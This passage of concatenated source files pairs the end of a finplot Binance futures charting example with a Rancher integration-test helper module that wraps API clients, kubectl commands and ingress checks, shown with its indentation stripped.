fplt.set_y_range(0, 100, ax=ax_rsi)
fplt.add_band(30, 70, color='#6335', ax=ax_rsi)
plots['sar'] = fplt.plot(data['sar'], color='#55a', style='+', width=0.6, legend='SAR', ax=ax)
plots['rsi'] = fplt.plot(data['rsi'], legend='RSI', ax=ax_rsi)
plots['stoch'] = fplt.plot(data['stoch'], color='#880', legend='Stoch', ax=ax_rsi)
plots['stoch_s'] = fplt.plot(data['stoch_s'], color='#650', ax=ax_rsi)
else:
ax.set_visible(xaxis=True)
ax_rsi.hide()
# price line
ax.price_line = pg.InfiniteLine(angle=0, movable=False, pen=fplt._makepen(fplt.candle_bull_body_color, style='.'))
ax.price_line.setPos(price_data['last_close'])
ax.price_line.pen.setColor(pg.mkColor(price_data['last_col']))
ax.addItem(ax.price_line, ignoreBounds=True)
# restores saved zoom position, if in range
fplt.refresh()
def dark_mode_toggle(dark):
'''Digs into the internals of finplot and pyqtgraph to change the colors of existing
plots, axes, backgronds, etc.'''
# first set the colors we'll be using
if dark:
fplt.foreground = '#777'
fplt.background = '#090c0e'
fplt.candle_bull_color = fplt.candle_bull_body_color = '#0b0'
fplt.candle_bear_color = '#a23'
volume_transparency = '6'
else:
fplt.foreground = '#444'
fplt.background = fplt.candle_bull_body_color = '#fff'
fplt.candle_bull_color = '#380'
fplt.candle_bear_color = '#c50'
volume_transparency = 'c'
fplt.volume_bull_color = fplt.volume_bull_body_color = fplt.candle_bull_color + volume_transparency
fplt.volume_bear_color = fplt.candle_bear_color + volume_transparency
fplt.cross_hair_color = fplt.foreground+'8'
fplt.draw_line_color = '#888'
fplt.draw_done_color = '#555'
pg.setConfigOptions(foreground=fplt.foreground, background=fplt.background)
# control panel color
if ctrl_panel is not None:
p = ctrl_panel.palette()
p.setColor(ctrl_panel.darkmode.foregroundRole(), pg.mkColor(fplt.foreground))
ctrl_panel.darkmode.setPalette(p)
# window background
for win in fplt.windows:
win.setBackground(fplt.background)
# axis, crosshair, candlesticks, volumes
axs = [ax for win in fplt.windows for ax in win.axs]
vbs = set([ax.vb for ax in axs])
axs += fplt.overlay_axs
axis_pen = fplt._makepen(color=fplt.foreground)
for ax in axs:
ax.axes['left']['item'].setPen(axis_pen)
ax.axes['left']['item'].setTextPen(axis_pen)
ax.axes['bottom']['item'].setPen(axis_pen)
ax.axes['bottom']['item'].setTextPen(axis_pen)
if ax.crosshair is not None:
ax.crosshair.vline.pen.setColor(pg.mkColor(fplt.foreground))
ax.crosshair.hline.pen.setColor(pg.mkColor(fplt.foreground))
ax.crosshair.xtext.setColor(fplt.foreground)
ax.crosshair.ytext.setColor(fplt.foreground)
for item in ax.items:
if isinstance(item, fplt.FinPlotItem):
isvolume = ax in fplt.overlay_axs
if not isvolume:
item.colors.update(
dict(bull_shadow = fplt.candle_bull_color,
bull_frame = fplt.candle_bull_color,
bull_body = fplt.candle_bull_body_color,
bear_shadow = fplt.candle_bear_color,
bear_frame = fplt.candle_bear_color,
bear_body = fplt.candle_bear_color))
else:
item.colors.update(
dict(bull_frame = fplt.volume_bull_color,
bull_body = fplt.volume_bull_body_color,
bear_frame = fplt.volume_bear_color,
bear_body = fplt.volume_bear_color))
item.repaint()
def create_ctrl_panel(win):
panel = QWidget(win)
panel.move(100, 0)
win.scene().addWidget(panel)
layout = QtGui.QGridLayout(panel)
panel.symbol = QComboBox(panel)
[panel.symbol.addItem(i+'USDT') for i in 'BTC ETH XRP DOGE BNB SOL ADA LTC LINK DOT TRX BCH'.split()]
panel.symbol.setCurrentIndex(1)
layout.addWidget(panel.symbol, 0, 0)
panel.symbol.currentTextChanged.connect(change_asset)
layout.setColumnMinimumWidth(1, 30)
panel.interval = QComboBox(panel)
[panel.interval.addItem(i) for i in '1d 4h 1h 30m 15m 5m 1m'.split()]
panel.interval.setCurrentIndex(6)
layout.addWidget(panel.interval, 0, 2)
panel.interval.currentTextChanged.connect(change_asset)
layout.setColumnMinimumWidth(3, 30)
panel.indicators = QComboBox(panel)
[panel.indicators.addItem(i) for i in 'Clean:Few indicators:Moar indicators'.split(':')]
panel.indicators.setCurrentIndex(1)
layout.addWidget(panel.indicators, 0, 4)
panel.indicators.currentTextChanged.connect(change_asset)
layout.setColumnMinimumWidth(5, 30)
panel.darkmode = QCheckBox(panel)
panel.darkmode.setText('Haxxor mode')
panel.darkmode.setCheckState(2)
panel.darkmode.toggled.connect(dark_mode_toggle)
layout.addWidget(panel.darkmode, 0, 6)
return panel
plots = {}
fplt.y_pad = 0.07 # pad some extra (for control panel)
fplt.max_zoom_points = 7
fplt.autoviewrestore()
ax,ax_rsi = fplt.create_plot('Complicated Binance Futures Example', rows=2, init_zoom_periods=300)
axo = ax.overlay()
# use websocket for real-time
ws = BinanceFutureWebsocket()
# hide rsi chart to begin with; show x-axis of top plot
ax_rsi.hide()
ax_rsi.vb.setBackgroundColor(None) # don't use odd background color
ax.set_visible(xaxis=True)
ctrl_panel = create_ctrl_panel(ax.vb.win)
dark_mode_toggle(True)
change_asset()
fplt.timer_callback(realtime_update_plot, 1) # update every second
fplt.show()
|
common.py
|
from ..common import * # NOQA
import inspect
import json
import os
import random
import subprocess
import ssl
import time
import requests
import ast
import paramiko
import rancher
import pytest
from urllib.parse import urlparse
from rancher import ApiError
from lib.aws import AmazonWebServices
from copy import deepcopy
from threading import Lock
from threading import Thread
import websocket
import base64
DEFAULT_CATALOG_TIMEOUT = 15
DEFAULT_MONITORING_TIMEOUT = 180
DEFAULT_CLUSTER_STATE_TIMEOUT = 320
DEFAULT_MULTI_CLUSTER_APP_TIMEOUT = 300
DEFAULT_APP_DELETION_TIMEOUT = 360
DEFAULT_APP_V2_TIMEOUT = 60
CATTLE_API_URL = CATTLE_TEST_URL + "/v3"
CATTLE_AUTH_URL = \
CATTLE_TEST_URL + "/v3-public/localproviders/local?action=login"
DNS_REGEX = "(https*://)(.*[^/])"
USER_PASSWORD = os.environ.get('USER_PASSWORD', "None")
ADMIN_PASSWORD = os.environ.get('ADMIN_PASSWORD', "None")
kube_fname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"k8s_kube_config")
MACHINE_TIMEOUT = float(os.environ.get('RANCHER_MACHINE_TIMEOUT', "1200"))
HARDENED_CLUSTER = ast.literal_eval(
os.environ.get('RANCHER_HARDENED_CLUSTER', "False"))
TEST_OS = os.environ.get('RANCHER_TEST_OS', "linux")
TEST_IMAGE = os.environ.get(
'RANCHER_TEST_IMAGE', "ranchertest/mytestcontainer")
TEST_IMAGE_PORT = os.environ.get('RANCHER_TEST_IMAGE_PORT', "80")
TEST_IMAGE_NGINX = os.environ.get('RANCHER_TEST_IMAGE_NGINX', "nginx")
TEST_IMAGE_OS_BASE = os.environ.get('RANCHER_TEST_IMAGE_OS_BASE', "ubuntu")
if TEST_OS == "windows":
DEFAULT_TIMEOUT = 300
skip_test_windows_os = pytest.mark.skipif(
TEST_OS == "windows",
reason='Tests Skipped for including Windows nodes cluster')
skip_test_hardened = pytest.mark.skipif(
HARDENED_CLUSTER,
reason='Tests Skipped due to being a hardened cluster')
UPDATE_KDM = ast.literal_eval(os.environ.get('RANCHER_UPDATE_KDM', "False"))
KDM_URL = os.environ.get("RANCHER_KDM_URL", "")
CLUSTER_NAME = os.environ.get("RANCHER_CLUSTER_NAME", "")
RANCHER_CLEANUP_CLUSTER = \
ast.literal_eval(os.environ.get('RANCHER_CLEANUP_CLUSTER', "True"))
env_file = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"rancher_env.config")
AWS_SSH_KEY_NAME = os.environ.get("AWS_SSH_KEY_NAME")
AWS_ACCESS_KEY_ID = os.environ.get("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY")
AWS_REGION = os.environ.get("AWS_REGION")
AWS_SUBNET = os.environ.get("AWS_SUBNET")
AWS_VPC = os.environ.get("AWS_VPC")
AWS_SG = os.environ.get("AWS_SG")
AWS_ZONE = os.environ.get("AWS_ZONE")
AWS_IAM_PROFILE = os.environ.get("AWS_IAM_PROFILE", "")
AWS_S3_BUCKET_NAME = os.environ.get("AWS_S3_BUCKET_NAME", "")
AWS_S3_BUCKET_FOLDER_NAME = os.environ.get("AWS_S3_BUCKET_FOLDER_NAME", "")
LINODE_ACCESSKEY = os.environ.get('RANCHER_LINODE_ACCESSKEY', "None")
NFS_SERVER_MOUNT_PATH = "/nfs"
TEST_RBAC = ast.literal_eval(os.environ.get('RANCHER_TEST_RBAC', "False"))
if_test_rbac = pytest.mark.skipif(TEST_RBAC is False,
reason='rbac tests are skipped')
TEST_ALL_SNAPSHOT = ast.literal_eval(
os.environ.get('RANCHER_TEST_ALL_SNAPSHOT', "False")
)
if_test_all_snapshot = \
pytest.mark.skipif(TEST_ALL_SNAPSHOT is False,
reason='Snapshots check tests are skipped')
DATA_SUBDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'resource')
# As of release 2.4 default rke scan profile is "rke-cis-1.4"
CIS_SCAN_PROFILE = os.environ.get('RANCHER_CIS_SCAN_PROFILE', "rke-cis-1.4")
# here are all supported roles for RBAC testing
CLUSTER_MEMBER = "cluster-member"
CLUSTER_OWNER = "cluster-owner"
PROJECT_MEMBER = "project-member"
PROJECT_OWNER = "project-owner"
PROJECT_READ_ONLY = "read-only"
rbac_data = {
"project": None,
"namespace": None,
"workload": None,
"p_unshared": None,
"ns_unshared": None,
"wl_unshared": None,
"users": {
CLUSTER_OWNER: {},
CLUSTER_MEMBER: {},
PROJECT_OWNER: {},
PROJECT_MEMBER: {},
PROJECT_READ_ONLY: {},
}
}
auth_rbac_data = {
"project": None,
"namespace": None,
"users": {}
}
# here are the global role templates used for
# testing globalRoleBinding and groupRoleBinding
TEMPLATE_MANAGE_CATALOG = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"*"
],
"resources": [
"catalogs",
"templates",
"templateversions"
]
}
],
"name": "gr-test-manage-catalog",
}
TEMPLATE_LIST_CLUSTER = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"get",
"list",
"watch"
],
"resources": [
"clusters"
]
}
],
"name": "gr-test-list-cluster",
}
# this is used when testing users from a auth provider
AUTH_PROVIDER = os.environ.get('RANCHER_AUTH_PROVIDER', "")
if AUTH_PROVIDER not in ["activeDirectory", "freeIpa", "openLdap", ""]:
pytest.fail("Invalid RANCHER_AUTH_PROVIDER. Please provide one of: "
"activeDirectory, freeIpa, or openLdap (case sensitive).")
NESTED_GROUP_ENABLED = ast.literal_eval(
os.environ.get('RANCHER_NESTED_GROUP_ENABLED', "False"))
# Admin Auth username and the shared password for all auth users
AUTH_USER_PASSWORD = os.environ.get('RANCHER_AUTH_USER_PASSWORD', "")
# the link to log in as an auth user
LOGIN_AS_AUTH_USER_URL = \
CATTLE_TEST_URL + "/v3-public/" \
+ AUTH_PROVIDER + "Providers/" \
+ AUTH_PROVIDER.lower() + "?action=login"
CATTLE_AUTH_PRINCIPAL_URL = CATTLE_TEST_URL + "/v3/principals?action=search"
# This is used for nested group when a third part Auth is enabled
nested_group = {
"auth_info": None,
"users": None,
"group_dic": None,
"groups": None
}
auth_requirements = not AUTH_PROVIDER or not AUTH_USER_PASSWORD
if_test_group_rbac = pytest.mark.skipif(
auth_requirements,
reason='Group RBAC tests are skipped.'
'Required AUTH env variables '
'have not been set.'
)
# -----------------------------------------------------------------------------
# global variables from test_create_ha.py
test_run_id = "test" + str(random.randint(10000, 99999))
RANCHER_HOSTNAME_PREFIX = os.environ.get("RANCHER_HOSTNAME_PREFIX",
test_run_id)
CERT_MANAGER_VERSION = os.environ.get("RANCHER_CERT_MANAGER_VERSION", "v1.0.1")
# -----------------------------------------------------------------------------
# this is used for testing rbac v2
test_rbac_v2 = os.environ.get("RANCHER_TEST_RBAC_V2", "False")
if_test_rbac_v2 = pytest.mark.skipif(test_rbac_v2 != "True",
reason='test for rbac v2 is skipped')
def is_windows(os_type=TEST_OS):
return os_type == "windows"
def get_cluster_client_for_token_v1(cluster_id, token):
url = CATTLE_TEST_URL + "/k8s/clusters/" + cluster_id + "/v1/schemas"
return rancher.Client(url=url, token=token, verify=False)
def get_admin_client():
return rancher.Client(url=CATTLE_API_URL, token=ADMIN_TOKEN, verify=False)
def get_user_client():
return rancher.Client(url=CATTLE_API_URL, token=USER_TOKEN, verify=False)
def get_client_for_token(token, url=CATTLE_API_URL):
return rancher.Client(url=url, token=token, verify=False)
def get_project_client_for_token(project, token):
p_url = project.links['self'] + '/schemas'
p_client = rancher.Client(url=p_url, token=token, verify=False)
return p_client
def get_cluster_client_for_token(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def up(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def wait_state(client, obj, state, timeout=DEFAULT_TIMEOUT):
wait_for(lambda: client.reload(obj).state == state, timeout)
return client.reload(obj)
def wait_for_condition(client, resource, check_function, fail_handler=None,
timeout=DEFAULT_TIMEOUT):
start = time.time()
resource = client.reload(resource)
while not check_function(resource):
if time.time() - start > timeout:
exceptionMsg = 'Timeout waiting for ' + resource.baseType + \
' to satisfy condition: ' + \
inspect.getsource(check_function)
if fail_handler:
exceptionMsg = exceptionMsg + fail_handler(resource)
raise Exception(exceptionMsg)
time.sleep(.5)
resource = client.reload(resource)
return resource
def get_setting_value_by_name(name):
settings_url = CATTLE_API_URL + "/settings/" + name
head = {'Authorization': 'Bearer ' + ADMIN_TOKEN}
response = requests.get(settings_url, verify=False, headers=head)
return response.json()["value"]
# Return value is negative if v1 < v2, zero if v1 == v2 and positive if v1 > v2
def compare_versions(v1, v2):
if tuple(map(int, (v1.split(".")))) > tuple(map(int, (v2.split(".")))):
return 1
elif tuple(map(int, (v1.split(".")))) < tuple(map(int, (v2.split(".")))):
return -1
else:
return 0
def create_project_and_ns(token, cluster, project_name=None, ns_name=None):
server_url = cluster.links['self'].split("/clusters")[0]
client = get_client_for_token(token, server_url)
p = create_project(client, cluster, project_name)
c_client = get_cluster_client_for_token(cluster, token)
ns = create_ns(c_client, cluster, p, ns_name)
return p, ns
def create_project(client, cluster, project_name=None):
if project_name is None:
project_name = random_name()
p = client.create_project(name=project_name,
clusterId=cluster.id)
time.sleep(5)
p = wait_until_available(client, p)
assert p.state == 'active'
return p
def create_project_with_pspt(client, cluster, pspt):
p = client.create_project(name=random_name(),
clusterId=cluster.id)
p = wait_until_available(client, p)
assert p.state == 'active'
return set_pspt_for_project(p, client, pspt)
def set_pspt_for_project(project, client, pspt):
project.setpodsecuritypolicytemplate(podSecurityPolicyTemplateId=pspt.id)
project = wait_until_available(client, project)
assert project.state == 'active'
return project
def create_ns(client, cluster, project, ns_name=None):
if ns_name is None:
ns_name = random_name()
ns = client.create_namespace(name=ns_name,
clusterId=cluster.id,
projectId=project.id)
wait_for_ns_to_become_active(client, ns)
ns = client.reload(ns)
assert ns.state == 'active'
return ns
def assign_members_to_cluster(client, user, cluster, role_template_id):
crtb = client.create_cluster_role_template_binding(
clusterId=cluster.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return crtb
def assign_members_to_project(client, user, project, role_template_id):
prtb = client.create_project_role_template_binding(
projectId=project.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return prtb
def change_member_role_in_cluster(client, user, crtb, role_template_id):
client.delete(crtb)
crtb = client.create_cluster_role_template_binding(
clusterId=crtb.clusterId,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id
)
return crtb
def change_member_role_in_project(client, user, prtb, role_template_id):
client.delete(prtb)
prtb = client.create_project_role_template_binding(
projectId=prtb.projectId,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id
)
return prtb
def create_kubeconfig(cluster, file_name=kube_fname):
generateKubeConfigOutput = cluster.generateKubeconfig()
print(generateKubeConfigOutput.config)
file = open(file_name, "w")
file.write(generateKubeConfigOutput.config)
file.close()
def validate_psp_error_worklaod(p_client, workload, error_message):
workload = wait_for_wl_transitioning(p_client, workload)
assert workload.state == "updating"
assert workload.transitioning == "error"
print(workload.transitioningMessage)
assert error_message in workload.transitioningMessage
def validate_all_workload_image_from_rancher(project_client, ns, pod_count=1,
ignore_pod_count=False,
deployment_list=None,
daemonset_list=None,
cronjob_list=None, job_list=None):
if cronjob_list is None:
cronjob_list = []
if daemonset_list is None:
daemonset_list = []
if deployment_list is None:
deployment_list = []
if job_list is None:
job_list = []
workload_list = deployment_list + daemonset_list + cronjob_list + job_list
wls = [dep.name for dep in project_client.list_workload(
namespaceId=ns.id).data]
assert len(workload_list) == len(wls), \
"Expected {} workload(s) to be present in {} namespace " \
"but there were {}".format(len(workload_list), ns.name, len(wls))
for workload_name in workload_list:
workloads = project_client.list_workload(name=workload_name,
namespaceId=ns.id).data
assert len(workloads) == workload_list.count(workload_name), \
"Expected {} workload(s) to be present with name {} " \
"but there were {}".format(workload_list.count(workload_name),
workload_name, len(workloads))
for workload in workloads:
for container in workload.containers:
assert str(container.image).startswith("rancher/")
if workload_name in deployment_list:
validate_workload(project_client, workload, "deployment",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
deployment_list.remove(workload_name)
if workload_name in daemonset_list:
validate_workload(project_client, workload, "daemonSet",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
daemonset_list.remove(workload_name)
if workload_name in cronjob_list:
validate_workload(project_client, workload, "cronJob",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
cronjob_list.remove(workload_name)
if workload_name in job_list:
validate_workload(project_client, workload, "job",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
job_list.remove(workload_name)
# Final assertion to ensure all expected workloads have been validated
assert not deployment_list + daemonset_list + cronjob_list
def validate_workload(p_client, workload, type, ns_name, pod_count=1,
wait_for_cron_pods=60, ignore_pod_count=False):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
# For cronjob, wait for the first pod to get created after
# scheduled wait time
if type == "cronJob":
time.sleep(wait_for_cron_pods)
if ignore_pod_count:
pods = p_client.list_pod(workloadId=workload.id).data
else:
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
pods = p_client.list_pod(workloadId=workload.id).data
assert len(pods) == pod_count
for pod in pods:
if type == "job":
job_type = True
expected_status = "Succeeded"
else:
job_type = False
expected_status = "Running"
p = wait_for_pod_to_running(p_client, pod, job_type=job_type)
assert p["status"]["phase"] == expected_status
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
if type == "deployment" or type == "statefulSet":
assert wl_result["status"]["readyReplicas"] == len(pods)
if type == "daemonSet":
assert wl_result["status"]["currentNumberScheduled"] == len(pods)
if type == "cronJob":
assert len(wl_result["status"]["active"]) >= len(pods)
if type == "job":
assert wl_result["status"]["succeeded"] == len(pods)
def validate_workload_with_sidekicks(p_client, workload, type, ns_name,
pod_count=1):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
for pod in pods:
wait_for_pod_to_running(p_client, pod)
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
assert wl_result["status"]["readyReplicas"] == pod_count
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
execute_kubectl_cmd(get_pods)
pods_result = execute_kubectl_cmd(get_pods)
assert len(pods_result["items"]) == pod_count
for pod in pods_result["items"]:
assert pod["status"]["phase"] == "Running"
assert len(pod["status"]["containerStatuses"]) == 2
assert "running" in pod["status"]["containerStatuses"][0]["state"]
assert "running" in pod["status"]["containerStatuses"][1]["state"]
def validate_workload_paused(p_client, workload, expectedstatus):
workloadStatus = p_client.list_workload(uuid=workload.uuid).data[0].paused
assert workloadStatus == expectedstatus
def validate_pod_images(expectedimage, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
for pod in pods["items"]:
assert pod["spec"]["containers"][0]["image"] == expectedimage
def validate_pods_are_running_by_id(expectedpods, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
curpodnames = []
for pod in pods["items"]:
curpodnames.append(pod["metadata"]["name"])
for expectedpod in expectedpods["items"]:
assert expectedpod["metadata"]["name"] in curpodnames
def validate_workload_image(client, workload, expectedImage, ns):
workload = client.list_workload(uuid=workload.uuid).data[0]
assert workload.containers[0].image == expectedImage
validate_pod_images(expectedImage, workload, ns.name)
def execute_kubectl_cmd(cmd, json_out=True, stderr=False,
kubeconfig=kube_fname):
command = 'kubectl --kubeconfig {0} {1}'.format(
kubeconfig, cmd)
if json_out:
command += ' -o json'
print("run cmd: \t{0}".format(command))
if stderr:
result = run_command_with_stderr(command, False)
else:
result = run_command(command, False)
print("returns: \t{0}".format(result))
if json_out:
result = json.loads(result)
return result
def run_command(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
return subprocess.check_output(command, shell=True, text=True)
except subprocess.CalledProcessError as e:
return None
def run_command_with_stderr(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
output = subprocess.check_output(command, shell=True,
stderr=subprocess.PIPE)
returncode = 0
except subprocess.CalledProcessError as e:
output = e.stderr
returncode = e.returncode
if log_out:
print("return code: \t{0}".format(returncode))
if returncode != 0:
print("output: \t{0}".format(output))
return output
def wait_for_wl_to_active(client, workload, timeout=DEFAULT_TIMEOUT):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_ingress_to_active(client, ingress, timeout=DEFAULT_TIMEOUT):
start = time.time()
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
return wl
def wait_for_wl_transitioning(client, workload, timeout=DEFAULT_TIMEOUT,
state="error"):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.transitioning != state:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_pod_to_running(client, pod, timeout=DEFAULT_TIMEOUT, job_type=False):
start = time.time()
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
if job_type:
expected_state = "succeeded"
else:
expected_state = "running"
while p.state != expected_state:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
return p
def get_schedulable_nodes(cluster, client=None, os_type=TEST_OS):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
schedulable_nodes = []
for node in nodes:
if not node.unschedulable:
shouldSchedule = True
# node.taints doesn't exist if the node has no taints.
try:
for tval in node.taints:
if str(tval).find("PreferNoSchedule") == -1:
if str(tval).find("NoExecute") > -1 or str(tval).find("NoSchedule") > -1:
shouldSchedule = False
break
except AttributeError:
pass
if not shouldSchedule:
continue
for key, val in node.labels.items():
# Either one of the labels should be present on the node
if key == 'kubernetes.io/os' or key == 'beta.kubernetes.io/os':
if val == os_type:
schedulable_nodes.append(node)
break
return schedulable_nodes
def get_etcd_nodes(cluster, client=None):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
etcd_nodes = []
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
return etcd_nodes
def get_role_nodes(cluster, role, client=None):
etcd_nodes = []
control_nodes = []
worker_nodes = []
node_list = []
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
if node.controlPlane:
control_nodes.append(node)
if node.worker:
worker_nodes.append(node)
if role == "etcd":
node_list = etcd_nodes
if role == "control":
node_list = control_nodes
if role == "worker":
node_list = worker_nodes
return node_list
def validate_ingress(p_client, cluster, workloads, host, path,
insecure_redirect=False):
time.sleep(10)
curl_args = " "
if (insecure_redirect):
curl_args = " -L --insecure "
if len(host) > 0:
curl_args += " --header 'Host: " + host + "'"
nodes = get_schedulable_nodes(cluster, os_type="linux")
target_name_list = get_target_names(p_client, workloads)
for node in nodes:
host_ip = resolve_node_ip(node)
url = "http://" + host_ip + path
if not insecure_redirect:
wait_until_ok(url, timeout=300, headers={
"Host": host
})
cmd = curl_args + " " + url
validate_http_response(cmd, target_name_list)
def validate_ingress_using_endpoint(p_client, ingress, workloads,
timeout=300,
certcheck=False, is_insecure=False):
target_name_list = get_target_names(p_client, workloads)
start = time.time()
fqdn_available = False
url = None
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
ingress_list = p_client.list_ingress(uuid=ingress.uuid).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
if public_endpoint["hostname"].startswith(ingress.name) \
or certcheck:
fqdn_available = True
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
if "path" in public_endpoint.keys():
url += public_endpoint["path"]
time.sleep(10)
validate_http_response(url, target_name_list, insecure=is_insecure)
def get_target_names(p_client, workloads):
pods = []
for workload in workloads:
pod_list = p_client.list_pod(workloadId=workload.id).data
pods.extend(pod_list)
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
return target_name_list
def get_endpoint_url_for_workload(p_client, workload, timeout=600):
fqdn_available = False
url = ""
start = time.time()
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
workload_list = p_client.list_workload(uuid=workload.uuid).data
assert len(workload_list) == 1
workload = workload_list[0]
if hasattr(workload, 'publicEndpoints'):
assert len(workload.publicEndpoints) > 0
url = "http://"
url = url + workload.publicEndpoints[0]["addresses"][0] + ":"
url = url + str(workload.publicEndpoints[0]["port"])
fqdn_available = True
return url
def wait_until_lb_is_active(url, timeout=300):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for LB to become active')
return
def check_for_no_access(url, verify=False):
try:
requests.get(url, verify=verify)
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return True
def wait_until_active(url, timeout=120):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for url '
'to become active')
return
def wait_until_ok(url, timeout=120, headers={}):
start = time.time()
while not check_if_ok(url, headers=headers):
time.sleep(.5)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for {0} to become ok'.format(url)
)
return
def wait_for_status_code(url, expected_code=200, timeout=DEFAULT_TIMEOUT):
start = time.time()
r = requests.get(url, verify=False)
while r.status_code != expected_code:
time.sleep(1)
r = requests.get(url, verify=False)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for status code {0}'
', actual code {1}'.format(
expected_code, r.status_code
)
)
return
def check_if_ok(url, verify=False, headers={}):
try:
res = requests.head(url, verify=verify, headers=headers)
if res.status_code == 200:
return True
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return False
def validate_http_response(cmd, target_name_list, client_pod=None,
insecure=False):
if client_pod is None and cmd.startswith("http://"):
wait_until_active(cmd, 60)
target_hit_list = target_name_list[:]
while len(target_hit_list) != 0:
if len(target_hit_list) == 0:
break
if client_pod is None:
curl_cmd = "curl " + cmd
if insecure:
curl_cmd += "\t--insecure"
result = run_command(curl_cmd)
else:
if is_windows():
wget_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Invoke-WebRequest -UseBasicParsing -Uri ' \
'{0}).Content }}"'.format(cmd)
else:
wget_cmd = "wget -qO- " + cmd
time.sleep(6)
result = kubectl_pod_exec(client_pod, wget_cmd)
result = result.decode()
if result is not None:
result = result.rstrip()
assert result in target_name_list
if result in target_hit_list:
target_hit_list.remove(result)
print("After removing all, the rest is: ", target_hit_list)
assert len(target_hit_list) == 0
def validate_cluster(client, cluster, intermediate_state="provisioning",
check_intermediate_state=True, skipIngresscheck=True,
nodes_not_in_active_state=[], k8s_version="",
userToken=USER_TOKEN, timeout=MACHINE_TIMEOUT):
# Allow sometime for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster = validate_cluster_state(
client, cluster,
check_intermediate_state=check_intermediate_state,
intermediate_state=intermediate_state,
nodes_not_in_active_state=nodes_not_in_active_state,
timeout=timeout)
create_kubeconfig(cluster)
if k8s_version != "":
check_cluster_version(cluster, k8s_version)
if hasattr(cluster, 'rancherKubernetesEngineConfig'):
check_cluster_state(len(get_role_nodes(cluster, "etcd", client)))
# check all workloads under the system project are active
# wait for workloads to be active
# time.sleep(DEFAULT_TIMEOUT)
print("checking if workloads under the system project are active")
sys_project = client.list_project(name='System',
